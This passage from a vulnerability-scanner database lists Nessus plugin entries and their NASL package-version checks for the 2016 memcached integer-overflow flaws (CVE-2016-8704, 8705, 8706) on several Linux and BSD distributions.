get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"memcached-1.4.15-10.el7_3.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"memcached-debuginfo-1.4.15-10.el7_3.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"memcached-devel-1.4.15-10.el7_3.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"memcached / memcached-debuginfo / memcached-devel\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T10:59:44", "description": "Cisco Talos reports :\n\nMultiple integer overflow vulnerabilities exist within Memcached that\ncould be exploited to achieve remote code execution on the targeted\nsystem. These vulnerabilities manifest in various Memcached functions\nthat are used in inserting, appending, prepending, or modifying\nkey-value data pairs. Systems which also have Memcached compiled with\nsupport for SASL authentication are also vulnerable to a third flaw\ndue to how Memcached handles SASL authentication commands.\n\nAn attacker could exploit these vulnerabilities by sending a\nspecifically crafted Memcached command to the targeted server.\nAdditionally, these vulnerabilities could also be exploited to leak\nsensitive process information which an attacker could use to bypass\ncommon exploitation mitigations, such as ASLR, and can be triggered\nmultiple times. This enables reliable exploitation which makes these\nvulnerabilities severe.", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-02T00:00:00", "title": "FreeBSD : memcached -- multiple vulnerabilities (f4bf713f-6ac7-4b76-8980-47bf90c5419f)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2016-11-02T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:memcached"], "id": "FREEBSD_PKG_F4BF713F6AC74B76898047BF90C5419F.NASL", "href": "https://www.tenable.com/plugins/nessus/94459", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94459);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n\n script_name(english:\"FreeBSD : memcached -- multiple vulnerabilities (f4bf713f-6ac7-4b76-8980-47bf90c5419f)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Cisco Talos reports :\n\nMultiple integer overflow vulnerabilities exist within Memcached that\ncould be exploited to achieve remote code execution on the targeted\nsystem. These vulnerabilities manifest in various Memcached functions\nthat are used in inserting, appending, prepending, or modifying\nkey-value data pairs. Systems which also have Memcached compiled with\nsupport for SASL authentication are also vulnerable to a third flaw\ndue to how Memcached handles SASL authentication commands.\n\nAn attacker could exploit these vulnerabilities by sending a\nspecifically crafted Memcached command to the targeted server.\nAdditionally, these vulnerabilities could also be exploited to leak\nsensitive process information which an attacker could use to bypass\ncommon exploitation mitigations, such as ASLR, and can be triggered\nmultiple times. This enables reliable exploitation which makes these\nvulnerabilities severe.\"\n );\n # http://blog.talosintel.com/2016/10/memcached-vulnerabilities.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dc2e8021\"\n );\n # https://vuxml.freebsd.org/freebsd/f4bf713f-6ac7-4b76-8980-47bf90c5419f.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d9667a35\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"memcached<1.4.33\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:14:14", "description": "Security fix for CVE-2016-8704, CVE-2016-8705, CVE-2016-8706\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-15T00:00:00", "title": "Fedora 23 : memcached (2016-4df986a71f)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2016-11-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:memcached", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-4DF986A71F.NASL", "href": "https://www.tenable.com/plugins/nessus/94804", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-4df986a71f.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94804);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_xref(name:\"FEDORA\", value:\"2016-4df986a71f\");\n\n script_name(english:\"Fedora 23 : memcached (2016-4df986a71f)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-8704, CVE-2016-8705, CVE-2016-8706\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-4df986a71f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected memcached package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"memcached-1.4.17-5.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"memcached\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:49:50", "description": "Aleksandar Nikolic of Cisco Talos discovered several integer overflow\nvulnerabilities in memcached, a high-performance memory object caching\nsystem. A remote attacker can take advantage of these flaws to cause a\ndenial of service (daemon crash), or potentially to execute arbitrary\ncode.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-04T00:00:00", "title": "Debian DSA-3704-1 : memcached - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2016-11-04T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:memcached"], "id": "DEBIAN_DSA-3704.NASL", "href": "https://www.tenable.com/plugins/nessus/94521", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3704. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94521);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_xref(name:\"DSA\", value:\"3704\");\n\n script_name(english:\"Debian DSA-3704-1 : memcached - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Aleksandar Nikolic of Cisco Talos discovered several integer overflow\nvulnerabilities in memcached, a high-performance memory object caching\nsystem. A remote attacker can take advantage of these flaws to cause a\ndenial of service (daemon crash), or potentially to execute arbitrary\ncode.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=842811\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=842812\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=842814\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/memcached\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3704\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the memcached packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 1.4.21-1.1+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"memcached\", reference:\"1.4.21-1.1+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T12:50:54", "description": "From Red Hat Security Advisory 2016:2819 :\n\nAn update for memcached is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nmemcached is a high-performance, distributed memory object caching\nsystem, generic in nature, but intended for use in speeding up dynamic\nweb applications by alleviating database load.\n\nSecurity Fix(es) :\n\n* Two integer overflow flaws, leading to heap-based buffer overflows,\nwere found in the memcached binary protocol. An attacker could create\na specially crafted message that would cause the memcached server to\ncrash or, potentially, execute arbitrary code. (CVE-2016-8704,\nCVE-2016-8705)\n\n* An integer overflow flaw, leading to a heap-based buffer overflow,\nwas found in memcached's parsing of SASL authentication messages. An\nattacker could create a specially crafted message that would cause the\nmemcached server to crash or, potentially, execute arbitrary code.\n(CVE-2016-8706)", "edition": 29, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-23T00:00:00", "title": "Oracle Linux 7 : memcached (ELSA-2016-2819)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2016-11-23T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:memcached", "p-cpe:/a:oracle:linux:memcached-devel", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2016-2819.NASL", "href": "https://www.tenable.com/plugins/nessus/95276", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:2819 and \n# Oracle Linux Security Advisory ELSA-2016-2819 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95276);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_xref(name:\"RHSA\", value:\"2016:2819\");\n\n script_name(english:\"Oracle Linux 7 : memcached (ELSA-2016-2819)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2016:2819 :\n\nAn update for memcached is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nmemcached is a high-performance, distributed memory object caching\nsystem, generic in nature, but intended for use in speeding up dynamic\nweb applications by alleviating database load.\n\nSecurity Fix(es) :\n\n* Two integer overflow flaws, leading to heap-based buffer overflows,\nwere found in the memcached binary protocol. An attacker could create\na specially crafted message that would cause the memcached server to\ncrash or, potentially, execute arbitrary code. (CVE-2016-8704,\nCVE-2016-8705)\n\n* An integer overflow flaw, leading to a heap-based buffer overflow,\nwas found in memcached's parsing of SASL authentication messages. An\nattacker could create a specially crafted message that would cause the\nmemcached server to crash or, potentially, execute arbitrary code.\n(CVE-2016-8706)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-November/006535.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected memcached packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:memcached-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"memcached-1.4.15-10.el7_3.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"memcached-devel-1.4.15-10.el7_3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"memcached / memcached-devel\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:13:59", "description": "Update to the latest upstream release, which fixes CVE-2016-8704,\nCVE-2016-8705, CVE-2016-8706.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-08T00:00:00", "title": "Fedora 25 : memcached (2016-0c4e822340)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2016-12-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:memcached", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2016-0C4E822340.NASL", "href": "https://www.tenable.com/plugins/nessus/95611", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-0c4e822340.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95611);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_xref(name:\"FEDORA\", value:\"2016-0c4e822340\");\n\n script_name(english:\"Fedora 25 : memcached (2016-0c4e822340)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to the latest upstream release, which fixes CVE-2016-8704,\nCVE-2016-8705, CVE-2016-8706.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-0c4e822340\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected memcached package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"memcached-1.4.33-1.fc25\")) 